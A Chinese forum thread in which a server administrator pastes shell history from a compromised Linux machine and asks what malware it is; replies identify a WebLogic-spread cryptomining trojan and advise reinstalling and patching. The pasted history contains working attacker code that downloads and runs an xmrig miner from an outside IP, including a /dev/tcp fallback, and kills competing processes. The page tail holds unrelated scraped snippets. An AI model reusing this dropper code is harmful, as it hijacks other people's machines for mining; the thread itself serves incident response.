linux系统中发现一些异常的脚本，求教会是什么木马病毒么，该怎么去查？

chenyl 2018-01-03 04:01:25

985 [2018-01-03 14:25:08][root][192.168.202.104] history
986 [2018-01-03 14:25:26][root][192.168.202.104] exit
987 ??sPid=$$
988 [2018-01-03 15:44:52][root][192.168.202.104] mPid=''
989 [2018-01-03 15:44:52][root][192.168.202.104] mName='java'
990 [2018-01-03 15:44:52][root][192.168.202.104] checkCmd() { command -v $1 >/dev/null 2>&1; }
991 [2018-01-03 15:44:52][root][192.168.202.104] downloader () { if checkCmd wget; then wget $1 -O $2 ; elif checkCmd curl; then curl $1 -o $2; elif checkCmd python; then if [ "`python -c "import sys; print(sys.version_info[0])"`" = "3" ]; then python -c "from urllib.request import urlopen; u = urlopen('"$1"'); localFile = open('"$2"', 'wb'); localFile.write(u.read()); localFile.close()"; else python -c "from urllib import urlopen; u = urlopen('"$1"'); localFile = open('"$2"', 'wb'); localFile.write(u.read()); localFile.close()"; fi; else cat < /dev/tcp/165.227.215.25/5555 > $2; fi; chmod +x $2; }
992 [2018-01-03 15:44:52][root][192.168.202.104] killer() { for tmpVar in `ps -aeo pid,%cpu,command | sed 1d | sort -k 2 | tail -n 10 | awk '{print $1}'`; do if [ $tmpVar = $sPid ]; then continue; fi; if [ $tmpVar = $mPid ]; then continue; fi; if [ `ps -o %cpu $tmpVar | sed 1d | sed 's/\..*//g'` -ge 60 ]; then if [ `ps $tmpVar | sed 1d | awk '{print $5}' | grep java` ]; then continue; fi; if [ `ps $tmpVar | sed 1d | awk '{print $5}' | grep sh` ]; then continue; fi; if [ `ps $tmpVar | sed 1d | awk '{print $5}' | grep bash` ]; then continue; fi; kill -9 $tmpVar; rm -f `ls -l /proc/$tmpVar/exe 2>&1 | sed 's/.*-> //g'`; fi; done; }
993 [2018-01-03 15:44:52][root][192.168.202.104] runer() { if [ -z "$mPid" ]; then if [ ! -f $mName ]; then downloader http://165.227.215.25/xmrig-y $mName; fi; chmod +x ./$mName; ./$mName; fi; mPid=`ps -eo pid,command | grep $mName | head -n 1 | awk '{print $1}'`; }
994 [2018-01-03 15:44:52][root][192.168.202.104] pkill python; pkill $mName
995 [2018-01-03 15:44:52][root][192.168.202.104] downloader http://165.227.215.25/xmrig-y $mName
996 [2018-01-03 14:26:01][root][192.168.202.104] history
997 [2018-01-03 14:47:22][root][192.168.202.104] crondtab -l
998 [2018-01-03 15:05:24][root][192.168.202.104] top
999 [2018-01-03 15:29:39][root][192.168.202.104] who
1000 [2018-01-03 15:34:20][root][192.168.202.104] exit

...全文

1569 7 打赏收藏转发到动态举报

写回复

7 条回复

切换为时间正序

请发表友善的回复…

发表回复

chenyl 2018-01-15

打赏
举报

回复

是挖坑木马病毒感染linux主机，Weblogic中间件，执行挖坑木马。根据文中描述已解决。 http://blog.nsfocus.net/weblogic-virus/

line_us 2018-01-07

打赏
举报

回复

我也出现了一模一样的情况

naiping888777 2018-01-04

打赏
举报

回复

我这边出现了一模一样的情况这个是什么病毒

naiping888777 2018-01-04

打赏
举报

回复

这个是什么病毒啊

zhxianbin 2018-01-04

打赏
举报

回复

IP地址: 165.227.215.25美国

chenyl 2018-01-03

打赏
举报

回复

重装麻烦啊，共用的服务器。找到一篇，估计就是挖坑病毒的变种 http://blog.nsfocus.net/weblogic-virus/ 先试试看

ckc 2018-01-03

打赏
举报

回复

别研究啦，赶快重装，重装完打补丁，设置防火墙，关闭不需要的服务

netfilter/iptables：IP 信息包过滤系统，它实际上由两个组件 netfilter 和 iptables组成。主要工作在网络层，针对IP数据包，体现在对包内的IP地址、端口等信息的处理。netfilter位于Linux内核中的包过滤功能体系称为Linux防火墙的“内核态”（内核空间）是内核的一部分，由一些数据包过滤表组成，这些表包含内核用来控制数据包过滤处理的规则集。iptables位于/sbin/iptables用来管理防火墙规则的工具称为Linux防火墙的“用户态”

Watchdog，Linux 挖矿机病毒新的改变功能快捷键合理的创建标题，有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能，丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 Linux 挖矿机病毒你好！这是你第一次使用 Markdown编辑器所展示的欢迎页。如果你想学习如何使用Markdown编辑器

站在计算机角度上解释，黑客就是去寻找网站、系统、软件等漏洞，并利用漏洞来取得一些数据或达到控制，让对方程序崩溃等效果。刚入门的黑客大部分从事渗透工作，而渗透大部分属于web安全方向。因此换个淳朴点的名字称呼他们就是 —— 安全工程师。是不是一下子就没那么神秘了？不过，所谓职称仅仅是代号。我认为黑客真正的魅力在于他们对于代码的痴迷与热爱，对自己能力近似于傲慢的自信以及打破陈规的创造力与勇气。当然不包括触犯法律。

[目录]，后续还会推出试读样章，敬请期待！购买地址：卓越：http://www.amazon.cn/%E8%9C%95%E5%8F%98-%E4%BB%8E%E8%8F%9C%E9%B8%9F%E5%88%B0Linux%E5%AE%89%E5%85%A8%E4%B8%93%E5%AE%B6-%E6%9D%8E%E6%B4%8B/dp/B005NAV...

站在计算机角度上解释，黑客就是去寻找网站、系统、软件等漏洞，并利用漏洞来取得一些数据或达到控制，让对方程序崩溃等效果。刚入门的黑客大部分从事渗透工作，而渗透大部分属于web安全方向。因此换个淳朴点的名字称呼他们就是 —— 安全工程师。是不是一下子就没那么神秘了？不过，所谓职称仅仅是代号。我认为黑客真正的魅力在于他们对于代码的痴迷与热爱，对自己能力近似于傲慢的自信以及打破陈规的创造力与勇气。当然不包括触犯法律。

系统维护与使用区

19,612

社区成员

74,603

社区内容

发帖

与我相关

我的任务

社区管理员

加入社区

近7日
近30日
至今

加载中

查看更多榜单

社区公告

暂无公告

试试用AI创作助手写篇文章吧

+ 用AI写文章